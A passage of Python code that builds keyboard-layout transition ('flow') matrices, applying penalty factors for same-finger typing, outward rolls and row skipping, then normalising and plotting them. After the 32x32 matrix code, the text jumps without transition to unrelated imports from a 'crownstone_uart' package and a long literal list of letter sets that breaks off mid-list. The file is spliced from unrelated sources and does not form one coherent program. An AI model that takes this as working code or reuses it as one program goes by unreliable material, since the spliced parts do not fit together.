        skip_top = [1, 2, 2, 3, 3, 4, 13,14,14,15,15,16]
        skip_bot = [10,9,11,10,12,11, 22,21,23,22,24,23]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_1away
            T[y-1, x-1] *= skip_row_1away
    if skip_row_2away < 1.0:
        skip_top = [1, 2,3, 4, 13,14,15,16]
        skip_bot = [11,12,9,10, 23,24,21,22]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_2away
            T[y-1, x-1] *= skip_row_2away
    if skip_row_3away < 1.0:
        skip_top = [1, 4, 13,16]
        skip_bot = [12,9, 24,21]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_3away
            T[y-1, x-1] *= skip_row_3away

    Flow24x24 = T

    # Normalize matrix with min-max scaling to a range with maximum = 1:
    newMin = np.min(Flow24x24) / np.max(Flow24x24)
    newMax = 1.0
    Flow24x24 = newMin + (Flow24x24 - np.min(Flow24x24)) * (newMax - newMin) / (np.max(Flow24x24) - np.min(Flow24x24))

    return Flow24x24
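The min-max scaling used above is slightly unusual: rather than mapping onto [0, 1], it sends the matrix maximum to 1 and the minimum to old_min/old_max, preserving the ratio between the best and worst transitions. A small numeric check of that property (standalone sketch):

```python
import numpy as np

def normalize_max_to_one(M):
    """Scale M so its maximum becomes 1 and its minimum becomes
    old_min / old_max, matching the scaling used in the flow matrices."""
    new_min = np.min(M) / np.max(M)
    return new_min + (M - np.min(M)) * (1.0 - new_min) / (np.max(M) - np.min(M))

M = np.array([[0.5, 1.0], [2.0, 4.0]])
scaled = normalize_max_to_one(M)
print(scaled.max())  # 1.0
print(scaled.min())  # 0.125  (= 0.5 / 4.0)
```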
Flow24x24 = create_24x24_flow_matrix(not_home_row, side_top,
    side_above_3away, side_above_2away, side_above_1away, middle_above_ring, ring_above_middle, outward,
    skip_row_3away, skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral, same_hand,
    shorter_above, adjacent_offset, inside_top, index_above)

# Print:
print_matrix_info(matrix_data=Flow24x24, matrix_label="Flow24x24", nkeys=24, nlines=30)
heatmap(data=Flow24x24, title="Flow24x24", xlabel="Key 1", ylabel="Key 2", print_output=print_output)
def create_32x32_flow_matrix(not_home_row, side_top, side_above_3away, side_above_2away, side_above_1away,
                             middle_above_ring, ring_above_middle, outward, skip_row_3away,
                             skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral,
                             same_hand, shorter_above, adjacent_offset, inside_top, index_above):
    all_32_keys = [1,2,3,4, 5,6,7,8, 9,10,11,12, 13,14,15,16, 17,18,19,20, 21,22,23,24,
                   25,26,27, 28,29,30, 31,32]

    # Create a matrix and multiply by flow factors that promote easy interkey transitions:
    T = np.ones((32, 32))
    if lateral < 1.0:
        for x in all_32_keys:
            for y in [25,26,27, 28,29,30, 31,32]:
                T[x-1, y-1] *= lateral
                T[y-1, x-1] *= lateral

    # 7. Promote alternating between hands over uncomfortable transitions with the same hand.
    if same_hand < 1.0:
        for i in [1,2,3,4,5,6,7,8,9,10,11,12, 25,26,27]:
            for j in [1,2,3,4,5,6,7,8,9,10,11,12, 25,26,27]:
                T[i-1,j-1] *= same_hand
        for i in [13,14,15,16,17,18,19,20,21,22,23,24, 28,29,30,31,32]:
            for j in [13,14,15,16,17,18,19,20,21,22,23,24, 28,29,30,31,32]:
                T[i-1,j-1] *= same_hand

    # 8. Promote little-to-index-finger roll-ins over index-to-little-finger outward rolls.
    #    Penalize (index, little) finger lateral movements:
    # 1  2  3  4  25    28 13 14 15 16 31
    # 5  6  7  8  26    29 17 18 19 20 32
    # 9 10 11 12  27    30 21 22 23 24
    if outward < 1.0:
        # same-row roll-outs:
        roll_ins = [[1,2],[2,3],[3,4], [5,6],[6,7],[7,8], [9,10],[10,11],[11,12],
                    [16,15],[15,14],[14,13], [20,19],[19,18],[18,17], [24,23],[23,22],[22,21]]
        for x in roll_ins:
            T[x[1]-1, x[0]-1] *= outward
        # same-row roll-outs, skipping keys:
        roll_ins_skip_keys = [[1,3],[2,4],[1,4], [5,7],[6,8],[5,8], [9,11],[10,12],[9,12],
                              [16,14],[15,13],[16,13], [20,18],[19,17],[20,17], [24,22],[23,21],[24,21]]
        #                     [1,25],[2,25],[3,25],
        #                     [5,26],[6,26],[7,26],
        #                     [9,27],[10,27],[11,27],
        #                     [16,28],[15,28],[14,28],
        #                     [20,29],[19,29],[18,29],
        #                     [24,30],[23,30],[22,30],
        #                     [31,15],[31,14],[31,13],[31,28],
        #                     [32,19],[32,18],[32,17],[32,29]]
        for x in roll_ins_skip_keys:
            T[x[1]-1, x[0]-1] *= outward
        # adjacent-row roll-outs:
        # 1  2  3  4  25    28 13 14 15 16 31
        # 5  6  7  8  26    29 17 18 19 20 32
        # 9 10 11 12  27    30 21 22 23 24
        roll_ins_adj_rows = [[1,6],[1,7],[1,8],[2,7],[2,8],[3,8],
                             [5,2],[5,3],[5,4],[6,3],[6,4],[7,4],
                             [5,10],[5,11],[5,12],[6,11],[6,12],[7,12],
                             [9,6],[9,7],[9,8],[10,7],[10,8],[11,8],
                             [16,19],[16,18],[16,17],[15,18],[15,17],[14,17],
                             [20,15],[20,14],[20,13],[19,14],[19,13],[18,13],
                             [20,23],[20,22],[20,21],[19,22],[19,21],[18,21],
                             [24,19],[24,18],[24,17],[23,18],[23,17],[22,17]]
        #                    [5,25],[6,25],[7,25],[8,25],
        #                    [5,27],[6,27],[7,27],[8,27],
        #                    [1,26],[2,26],[3,26],[4,26],
        #                    [9,26],[10,26],[11,26],[12,26],
        #                    [16,29],[15,29],[14,29],[13,29],
        #                    [24,29],[23,29],[22,29],[21,29],
        #                    [20,28],[19,28],[18,28],[17,28],
        #                    [20,30],[19,30],[18,30],[17,30],
        #                    [31,20],[31,19],[31,18],[31,17],[31,29],
        #                    [32,16],[32,15],[32,14],[32,13],[32,28],
        #                    [32,24],[32,23],[32,22],[32,21],[32,30]]
        for x in roll_ins_adj_rows:
            T[x[1]-1, x[0]-1] *= outward
        # upper<->lower row roll-outs:
        roll_ins_skip_home = [[1,10],[1,11],[1,12],[2,11],[2,12],[3,12],
                              [9,2],[9,3],[9,4],[10,3],[10,4],[11,4],
                              [16,23],[16,22],[16,21],[15,22],[15,21],[14,21],
                              [24,15],[24,14],[24,13],[23,14],[23,13],[22,13]]
        #                     [16,30],[15,30],[14,30],[13,30],
        #                     [9,25],[10,25],[11,25],[12,25],
        #                     [24,28],[23,28],[22,28],[21,28],
        #                     [1,27],[2,27],[3,27],[4,27],
        #                     [31,24],[31,23],[31,22],[31,21],[31,30]]
        for x in roll_ins_skip_home:
            T[x[1]-1, x[0]-1] *= outward

    # 9. Avoid stretching shorter fingers up and longer fingers down.
    # 1  2  3  4  25    28 13 14 15 16 31
    # 5  6  7  8  26    29 17 18 19 20 32
    # 9 10 11 12  27    30 21 22 23 24
    if index_above < 1.0:
        for x in [4]:
            for y in [4,5,6,7,8,26,9,10,11,12,27,28,13,14,15,16,31,29,17,18,19,20,32,30,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
        for x in [25]:
            for y in [25,5,6,7,8,26,9,10,11,12,27,28,13,14,15,16,31,29,17,18,19,20,32,30,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
        for x in [13]:
            for y in [1,2,3,4,25,5,6,7,8,26,9,10,11,12,27,13,29,17,18,19,20,32,30,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
        for x in [28]:
            for y in [1,2,3,4,25,5,6,7,8,26,9,10,11,12,27,28,29,17,18,19,20,32,30,21,22,23,24]:
                T[x-1, y-1] *= index_above
                T[y-1, x-1] *= index_above
    if inside_top < 1.0:
        for x in [4,25,28,13]:
            for j in range(0,32):
                T[x-1, j] *= inside_top
                T[j, x-1] *= inside_top
    if side_top < 1.0:
        for x in [1,4,25,28,13,16,31]:
            for j in range(0,32):
                T[x-1, j] *= side_top
                T[j, x-1] *= side_top
    if side_above_1away < 1.0:
        for x in [1]:
            for y in [6,10]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [5]:
            for y in [10]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [4,25]:
            for y in [7,11]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [8,26]:
            for y in [11]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [13,28]:
            for y in [18,22]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [17,29]:
            for y in [22]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [16,31]:
            for y in [19,23]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
        for x in [20,32]:
            for y in [23]:
                T[x-1, y-1] *= side_above_1away
                T[y-1, x-1] *= side_above_1away
    if side_above_2away < 1.0:
        for x in [1]:
            for y in [7,11]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [5]:
            for y in [11]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [4,25]:
            for y in [6,10]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [8,26]:
            for y in [10]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [13,28]:
            for y in [19,23]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [17,29]:
            for y in [23]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [16,31]:
            for y in [18,22]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
        for x in [20,32]:
            for y in [22]:
                T[x-1, y-1] *= side_above_2away
                T[y-1, x-1] *= side_above_2away
    if side_above_3away < 1.0:
        for x in [1]:
            for y in [8,12,26,27]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [5]:
            for y in [12,27]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [4,25]:
            for y in [5,9]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [8,26]:
            for y in [9]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [13,28]:
            for y in [20,24,32]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [17,29]:
            for y in [24]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [16,31]:
            for y in [17,21,29,30]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
        for x in [20,32]:
            for y in [21,30]:
                T[x-1, y-1] *= side_above_3away
                T[y-1, x-1] *= side_above_3away
    # 1  2  3  4  25    28 13 14 15 16 31
    # 5  6  7  8  26    29 17 18 19 20 32
    # 9 10 11 12  27    30 21 22 23 24
    if shorter_above < 1.0:
        for x in [1]:
            for y in [6,7,8,26,10,11,12,27]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [2]:
            for y in [7,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [4]:
            for y in [6,7,10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [25]:
            for y in [6,7,10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [5]:
            for y in [10,11,12,27]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [6]:
            for y in [11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [8]:
            for y in [10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [26]:
            for y in [10,11]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [16]:
            for y in [29,17,18,19,30,21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [31]:
            for y in [29,17,18,19,30,21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [15]:
            for y in [18,22]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [13]:
            for y in [18,19,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [28]:
            for y in [18,19,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [20]:
            for y in [30,21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [32]:
            for y in [30,21,22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [19]:
            for y in [22]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [17]:
            for y in [22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
        for x in [29]:
            for y in [22,23]:
                T[x-1, y-1] *= shorter_above
                T[y-1, x-1] *= shorter_above
    if ring_above_middle < 1.0:
        ring_above_middles = [[2,7],[6,11],[2,11],
                              [15,18],[19,22],[15,22]]
        for x in ring_above_middles:
            T[x[0]-1, x[1]-1] *= ring_above_middle
            T[x[1]-1, x[0]-1] *= ring_above_middle
    if middle_above_ring < 1.0:
        middle_above_rings = [[6,3],[10,7],[10,3],
                              [19,14],[23,18],[23,14]]
        for x in middle_above_rings:
            T[x[0]-1, x[1]-1] *= middle_above_ring
            T[x[1]-1, x[0]-1] *= middle_above_ring

    # 10. Avoid using the same finger.
    # 1  2  3  4  25    28 13 14 15 16 31
    # 5  6  7  8  26    29 17 18 19 20 32
    # 9 10 11 12  27    30 21 22 23 24
    if same_finger < 1.0:
        same_fingers = [[1,5],[5,9],[1,9], [2,6],[6,10],[2,10],
                        [3,7],[7,11],[3,11], [4,8],[8,12],[4,12],
                        [25,26],[26,27],[25,27], [28,29],[29,30],[28,30], [31,32],
                        [4,25],[4,26],[4,27], [8,25],[8,26],[8,27], [12,25],[12,26],[12,27],
                        [13,28],[13,29],[13,30], [17,28],[17,29],[17,30], [21,28],[21,29],[21,30],
                        [31,16],[31,20],[31,24], [32,16],[32,20],[32,24],
                        [13,17],[17,21],[13,21], [14,18],[18,22],[14,22],
                        [15,19],[19,23],[15,23], [16,20],[20,24],[16,24]]
        for x in same_fingers:
            T[x[0]-1, x[1]-1] *= same_finger
            T[x[1]-1, x[0]-1] *= same_finger

    # 11. Avoid the upper and lower rows.
    if not_home_row < 1.0:
        not_home_row_keys = [1,2,3,4,25, 9,10,11,12,27, 28,13,14,15,16,31, 30,21,22,23,24]
        for x in not_home_row_keys:
            for j in range(0,32):
                T[x-1, j] *= not_home_row
                T[j, x-1] *= not_home_row

    # 12. Avoid skipping over the home row.
    # 1  2  3  4  25    28 13 14 15 16 31
    # 5  6  7  8  26    29 17 18 19 20 32
    # 9 10 11 12  27    30 21 22 23 24
    if skip_row_0away < 1.0:
        skip_top = [1, 2, 3, 4, 4,25,25, 28,28,13,13,14,15,16,31]
        skip_bot = [9,10,11,12,27,12,27, 30,21,30,21,22,23,24,24]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_0away
            T[y-1, x-1] *= skip_row_0away
    if skip_row_1away < 1.0:
        skip_top = [1, 2, 2, 3, 3, 4, 4,25, 28,13,13,14,14,15,15,16,31]
        skip_bot = [10,9,11,10,12,11,27,11, 22,30,22,21,23,22,24,23,23]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_1away
            T[y-1, x-1] *= skip_row_1away
    if skip_row_2away < 1.0:
        skip_top = [1, 2,3, 4,25, 28,13,14,15,16,31]
        skip_bot = [11,12,9,10,10, 23,23,24,21,22,22]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_2away
            T[y-1, x-1] *= skip_row_2away
    if skip_row_3away < 1.0:
        skip_top = [1, 4,25, 28,13,16,16,31,31]
        skip_bot = [12,9, 9, 24,24,21,30,21,30]
        for ix, x in enumerate(skip_top):
            y = skip_bot[ix]
            T[x-1, y-1] *= skip_row_3away
            T[y-1, x-1] *= skip_row_3away

    Flow32x32 = T

    # Normalize matrix with min-max scaling to a range with maximum = 1:
    newMin = np.min(Flow32x32) / np.max(Flow32x32)
    newMax = 1.0
    Flow32x32 = newMin + (Flow32x32 - np.min(Flow32x32)) * (newMax - newMin) / (np.max(Flow32x32) - np.min(Flow32x32))

    return Flow32x32
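Both flow-matrix builders repeat the same two-line pattern — penalize `T[x-1, y-1]` and its transpose entry — hundreds of times. A small helper that condenses this symmetric update (a refactoring sketch, not part of the original script; `penalize_pairs` is a hypothetical name):

```python
import numpy as np

def penalize_pairs(T, pairs, factor):
    """Apply a penalty factor symmetrically for each 1-indexed key pair,
    condensing the repeated T[x-1, y-1] *= f; T[y-1, x-1] *= f pattern."""
    for x, y in pairs:
        T[x - 1, y - 1] *= factor
        T[y - 1, x - 1] *= factor
    return T

T = np.ones((4, 4))
penalize_pairs(T, [(1, 2), (3, 4)], 0.9)
print(T[0, 1], T[1, 0])  # 0.9 0.9
print(T[0, 2])           # 1.0 (pair not listed, so untouched)
```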
Flow32x32 = create_32x32_flow_matrix(not_home_row, side_top,
side_above_3away, side_above_2away, side_above_1away, middle_above_ring, ring_above_middle, outward,
skip_row_3away, skip_row_2away, skip_row_1away, skip_row_0away, same_finger, lateral, same_hand,
shorter_above, adjacent_offset, inside_top, index_above)
# Print:
print_matrix_info(matrix_data=Flow32x32, matrix_label="Flow32x32", nkeys=32, nlines=30)
heatmap(data=Flow32x32, title="Flow32x32", xlabel="Key 1", ylabel="Key 2", print_output=print_output)
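The normalization step above maps the flow matrix so its maximum becomes exactly 1.0, with the new minimum chosen as min/max so that the ratio between the smallest and largest entries is preserved. A minimal standalone sketch of that rescaling (the `rescale_max_to_one` helper and the 2x2 example matrix are illustrative, not part of the original code):

```python
import numpy as np

def rescale_max_to_one(M):
    # Min-max scale so that max(M) -> 1.0 and min(M) -> min(M)/max(M),
    # mirroring the normalization applied to Flow32x32 above.
    lo, hi = np.min(M), np.max(M)
    new_min = lo / hi
    return new_min + (M - lo) * (1.0 - new_min) / (hi - lo)

M = np.array([[2.0, 4.0],
              [6.0, 8.0]])
R = rescale_max_to_one(M)
print(R.max())  # 1.0
print(R.min())  # 0.25 (= 2/8, the old min/max ratio)
```

Note that this linear map keeps the relative ordering of all entries, so multiplicative penalties applied earlier (same_finger, skip_row_*, etc.) retain their effect after normalization.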
from crownstone_uart.core.CrownstoneUart import CrownstoneUart
from crownstone_uart.core.UartEventBus import UartEventBus
from crownstone_uart.topics.UartTopics import UartTopics
#number of sets: 1124
currentAltSets1 = [[], ['N'], ['J'], ['C'], ['E'], ['F'], ['A'], ['K'], ['B'], ['P'], ['H'], ['O'], ['D'], ['Q'], ['I'], ['G'], ['M'], ['L'], ['N', 'E'], ['N', 'K'], ['N', 'P'], ['N', 'H'], ['N', 'I'], ['J', 'E'], ['J', 'F'], ['J', 'A'], ['J', 'P'], ['J', 'O'], ['J', 'Q'], ['J', 'G'], ['J', 'L'], ['C', 'E'], ['C', 'F'], ['C', 'A'], ['C', 'K'], ['C', 'O'], ['C', 'Q'], ['C', 'I'], ['C', 'G'], ['E', 'K'], ['E', 'B'], ['F', 'K'], ['F', 'B'], ['F', 'O'], ['F', 'Q'], ['F', 'G'], ['F', 'M'], ['F', 'L'], ['A', 'B'], ['A', 'O'], ['A', 'D'], ['A', 'Q'], ['A', 'L'], ['K', 'H'], ['K', 'Q'], ['K', 'I'], ['K', 'G'], ['K', 'M'], ['K', 'L'], ['B', 'H'], ['P', 'O'], ['P', 'D'], ['P', 'Q'], ['P', 'G'], ['P', 'M'], ['P', 'L'], ['H', 'D'], ['H', 'M'], ['O', 'Q'], ['O', 'I'], ['O', 'G'], ['O', 'M'], ['D', 'Q'], ['D', 'I'], ['D', 'G'], ['D', 'L'], ['Q', 'M'], ['Q', 'L'], ['I', 'G'], ['I', 'M'], ['I', 'L'], ['G', 'M'], ['G', 'L'], ['M', 'L'], ['N', 'J', 'E'], ['N', 'E', 'K'], ['N', 'E', 'B'], ['N', 'K', 'H'], ['N', 'K', 'I'], ['N', 'P', 'I'], ['N', 'P', 'M'], ['N', 'O', 'I'], ['N', 'D', 'I'], ['N', 'I', 'G'], ['N', 'I', 'L'], ['J', 'C', 'E'], ['J', 'E', 'F'], ['J', 'E', 'P'], ['J', 'F', 'K'], ['J', 'F', 'B'], ['J', 'F', 'O'], ['J', 'F', 'Q'], ['J', 'F', 'G'], ['J', 'F', 'L'], ['J', 'A', 'P'], ['J', 'A', 'O'], ['J', 'A', 'D'], ['J', 'A', 'Q'], ['J', 'A', 'L'], ['J', 'P', 'O'], ['J', 'P', 'Q'], ['J', 'P', 'G'], ['J', 'P', 'L'], ['J', 'O', 'Q'], ['J', 'O', 'G'], ['J', 'Q', 'L'], ['J', 'G', 'L'], ['C', 'E', 'A'], ['C', 'E', 'K'], ['C', 'E', 'O'], ['C', 'E', 'Q'], ['C', 'E', 'G'], ['C', 'F', 'K'], ['C', 'F', 'O'], ['C', 'F', 'Q'], ['C', 'F', 'I'], ['C', 'F', 'G'], ['C', 'F', 'M'], ['C', 'A', 'B'], ['C', 'A', 'O'], ['C', 'A', 'D'], ['C', 'A', 'Q'], ['C', 'A', 'I'], ['C', 'K', 'Q'], ['C', 'K', 'I'], ['C', 'K', 'G'], ['C', 'O', 'Q'], ['C', 'O', 'I'], ['C', 'O', 'G'], ['C', 'I', 'G'], ['C', 'I', 'L'], ['E', 'B', 'H'], ['F', 'A', 'B'], ['F', 'K', 'Q'], ['F', 'K', 'G'], ['F', 'K', 'M'], ['F', 'K', 
'L'], ['F', 'B', 'H'], ['F', 'B', 'M'], ['F', 'O', 'Q'], ['F', 'O', 'G'], ['F', 'O', 'M'], ['F', 'Q', 'M'], ['F', 'Q', 'L'], ['F', 'G', 'M'], ['F', 'G', 'L'], ['F', 'M', 'L'], ['A', 'B', 'O'], ['A', 'B', 'Q'], ['A', 'B', 'L'], ['A', 'O', 'Q'], ['A', 'D', 'Q'], ['A', 'D', 'G'], ['A', 'D', 'L'], ['A', 'Q', 'L'], ['K', 'B', 'H'], ['K', 'P', 'M'], ['K', 'H', 'D'], ['K', 'H', 'M'], ['K', 'O', 'G'], ['K', 'Q', 'M'], ['K', 'Q', 'L'], ['K', 'I', 'G'], ['K', 'I', 'M'], ['K', 'I', 'L'], ['K', 'G', 'M'], ['K', 'G', 'L'], ['K', 'M', 'L'], ['P', 'H', 'M'], ['P', 'O', 'Q'], ['P', 'O', 'G'], ['P', 'O', 'M'], ['P', 'D', 'Q'], ['P', 'D', 'G'], ['P', 'D', 'L'], ['P', 'Q', 'M'], ['P', 'Q', 'L'], ['P', 'G', 'M'], ['P', 'G', 'L'], ['P', 'M', 'L'], ['H', 'D', 'Q'], ['H', 'D', 'I'], ['H', 'D', 'G'], ['H', 'D', 'M'], ['H', 'D', 'L'], ['O', 'D', 'G'], ['O', 'Q', 'G'], ['O', 'Q', 'M'], ['O', 'Q', 'L'], ['O', 'I', 'G'], ['O', 'I', 'M'], ['O', 'G', 'M'], ['D', 'Q', 'L'], ['D', 'I', 'G'], ['D', 'I', 'L'], ['D', 'G', 'L'], ['Q', 'I', 'L'], ['Q', 'M', 'L'], ['I', 'G', 'M'], ['I', 'G', 'L'], ['I', 'M', 'L'], ['G', 'M', 'L'], ['N', 'J', 'E', 'F'], ['N', 'J', 'E', 'P'], ['N', 'C', 'E', 'I'], ['N', 'E', 'B', 'H'], ['N', 'K', 'P', 'M'], ['N', 'K', 'I', 'G'], ['N', 'K', 'I', 'L'], ['N', 'P', 'H', 'M'], ['N', 'P', 'O', 'I'], ['N', 'P', 'D', 'I'], ['N', 'P', 'I', 'G'], ['N', 'P', 'I', 'M'], ['N', 'P', 'I', 'L'], ['N', 'H', 'D', 'I'], ['N', 'O', 'I', 'G'], ['N', 'D', 'I', 'G'], ['N', 'D', 'I', 'L'], ['N', 'Q', 'I', 'L'], ['N', 'I', 'G', 'L'], ['J', 'C', 'E', 'F'], ['J', 'C', 'E', 'A'], ['J', 'C', 'E', 'P'], ['J', 'C', 'E', 'O'], ['J', 'C', 'E', 'Q'], ['J', 'C', 'E', 'G'], ['J', 'E', 'F', 'K'], ['J', 'E', 'F', 'B'], ['J', 'F', 'A', 'B'], ['J', 'F', 'K', 'Q'], ['J', 'F', 'K', 'G'], ['J', 'F', 'K', 'L'], ['J', 'F', 'B', 'H'], ['J', 'F', 'P', 'M'], ['J', 'F', 'O', 'Q'], ['J', 'F', 'O', 'G'], ['J', 'F', 'Q', 'L'], ['J', 'F', 'G', 'L'], ['J', 'A', 'P', 'O'], ['J', 'A', 'P', 'D'], ['J', 'A', 'P', 'Q'], ['J', 
'A', 'P', 'L'], ['J', 'A', 'O', 'Q'], ['J', 'A', 'D', 'Q'], ['J', 'A', 'D', 'G'], ['J', 'A', 'D', 'L'], ['J', 'A', 'Q', 'L'], ['J', 'P', 'O', 'Q'], ['J', 'P', 'O', 'G'], ['J', 'P', 'Q', 'L'], ['J', 'P', 'G', 'L'], ['J', 'O', 'Q', 'G'], ['J', 'O', 'Q', 'L'], ['C', 'E', 'A', 'B'], ['C', 'E', 'A', 'O'], ['C', 'E', 'A', 'D'], ['C', 'E', 'A', 'Q'], ['C', 'E', 'K', 'Q'], ['C', 'E', 'K', 'G'], ['C', 'E', 'O', 'Q'], ['C', 'E', 'O', 'G'], ['C', 'F', 'A', 'B'], ['C', 'F', 'K', 'Q'], ['C', 'F', 'K', 'I'], ['C', 'F', 'K', 'G'], ['C', 'F', 'K', 'M'], ['C', 'F', 'O', 'Q'], ['C', 'F', 'O', 'I'], ['C', 'F', 'O', 'G'], ['C', 'F', 'O', 'M'], ['C', 'F', 'Q', 'M'], ['C', 'F', 'I', 'G'], ['C', 'F', 'I', 'M'], ['C', 'F', 'I', 'L'], ['C', 'F', 'G', 'M'], ['C', 'A', 'B', 'O'], ['C', 'A', 'B', 'Q'], ['C', 'A', 'B', 'I'], ['C', 'A', 'O', 'Q'], ['C', 'A', 'O', 'I'], ['C', 'A', 'D', 'Q'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['C', 'A', 'I', 'L'], ['C', 'K', 'O', 'G'], ['C', 'K', 'I', 'G'], ['C', 'K', 'I', 'L'], ['C', 'O', 'Q', 'G'], ['C', 'O', 'I', 'G'], ['C', 'Q', 'I', 'L'], ['C', 'I', 'G', 'L'], ['E', 'K', 'B', 'H'], ['F', 'A', 'B', 'O'], ['F', 'A', 'B', 'Q'], ['F', 'A', 'B', 'M'], ['F', 'A', 'B', 'L'], ['F', 'K', 'B', 'H'], ['F', 'K', 'O', 'G'], ['F', 'K', 'Q', 'M'], ['F', 'K', 'Q', 'L'], ['F', 'K', 'G', 'M'], ['F', 'K', 'G', 'L'], ['F', 'K', 'M', 'L'], ['F', 'B', 'H', 'M'], ['F', 'O', 'Q', 'G'], ['F', 'O', 'Q', 'M'], ['F', 'O', 'Q', 'L'], ['F', 'O', 'G', 'M'], ['F', 'Q', 'M', 'L'], ['F', 'G', 'M', 'L'], ['A', 'B', 'H', 'D'], ['A', 'B', 'O', 'Q'], ['A', 'B', 'Q', 'L'], ['A', 'O', 'D', 'G'], ['A', 'O', 'Q', 'L'], ['A', 'D', 'Q', 'L'], ['A', 'D', 'G', 'L'], ['K', 'P', 'H', 'M'], ['K', 'P', 'Q', 'M'], ['K', 'P', 'G', 'M'], ['K', 'P', 'M', 'L'], ['K', 'H', 'D', 'Q'], ['K', 'H', 'D', 'I'], ['K', 'H', 'D', 'G'], ['K', 'H', 'D', 'M'], ['K', 'H', 'D', 'L'], ['K', 'O', 'Q', 'G'], ['K', 'O', 'I', 'G'], ['K', 'O', 'G', 'M'], ['K', 'Q', 'I', 'L'], ['K', 'Q', 'M', 'L'], ['K', 'I', 'G', 'M'], 
